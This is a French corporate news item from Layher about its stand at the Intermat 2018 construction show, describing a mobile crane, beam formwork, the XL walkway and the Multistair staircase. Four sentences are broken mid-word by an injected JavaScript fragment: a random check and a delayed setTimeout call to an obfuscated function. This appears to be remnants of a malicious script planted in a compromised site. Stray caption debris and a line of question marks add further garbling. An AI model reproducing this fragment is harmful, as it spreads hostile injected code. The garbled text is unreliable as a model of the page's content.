ACTUALITÉS

LAYHER DE RETOUR AU SALON INTERMAT

En cette année 2018, Layher sera présent sur le salon Intermat, du 23 au 28 avril 2018 au parc des expositions de Villepinte Hall 6 standom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and 6E122.

 

INTERMAT, LE SALON INTERNATIONAL DE LA CONSTRUCTION ET DES INFRASTRUCTURES 

 

Intermat est un salon professionnel accueillant plus de 183 000 visiteurs internationaux . Chaque exposant présentera lors du salon des offres de matériels, équipements et solutions pour la construction dédiés aux grandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ands chantiers, travaux publics et au bâtiment. Intermat permet aux nombreux visiteurs de découvrir les dernières tendances et innovations technologiques de la construction. 

De nombreuses solutions Layher seront exposées sur le salon. Nous retrouverons parmi ces innovations la grue mobile 3 000, le coffrage des poutres, la passerelle XL, le multistair et bien d’autres.

 

 

LA GRUE MOBILE 3000

 

La grue mobile 3000 est composée d’un bras articulé multidirectionnel, permettant un lest sur le support-plateau, réglable sur trois niveaux de hauteurs. Idéal pour l’entourage de piliers ou le murage de parois existantes, sa mobilité est totale grâce au moteur électrique sous commandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande à distance. De plus, sa prise au vent est très réduite sur le profil ultra-mince du bras articulé. Son volume réduit au transport permet un levé en continu de la tour.

 

 

????????????????????????????????????

 

LE COFFRAGE DES POUTRES

 

Le coffrage des poutres Layher permet de concevoir des poutres en béton armé grâce à des pièces robustes et faciles à utiliser. Les pinces de coffrage permettent le maintien en toute simplicité des deux planches verticales. Les suspentes de coffrage constituent un support réglable à l’infini et la goupille quant à elle, permet de régler la largeur très facilement.

 

 

723 2

 

LA PASSERELLE XL

 

La passerelle XL est constituée d’un ensemble d’éléments de haute résistance, totalement compatible avec l’Universel Layher. Son montage rapide et sécurisé permet une réduction d’utilisation des pièces, allant jusqu’à 30% en moins par rapport à une solution d’échafaudage classique. 

 

OLYMPUS DIGITAL CAMERA    CD 16_10  Layher Schweiz Fotograf    +  CD 93_10

 

 

LE MULTISTAIR

 

Le multistair est un escalier de chantier hélicoïdal permettant de desservir tous les niveaux. Élaboré en majorité à partir d’éléments standom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andards, il est totalement compatible avec l’Universel. L’escalier multistair permet de nombreuses possibilités :  il peut être utilisé seul ou intégré à une structure d’échafaudage, et peut être levé à la grue. La rotation à 90° de l’escalier permet d’avoir la sortie de l’échafaudage du côté souhaité. Conçu afin de mettre en place un palier intermédiaire ou de finition, une sortie est possible tous les 20 cm.

 

723 1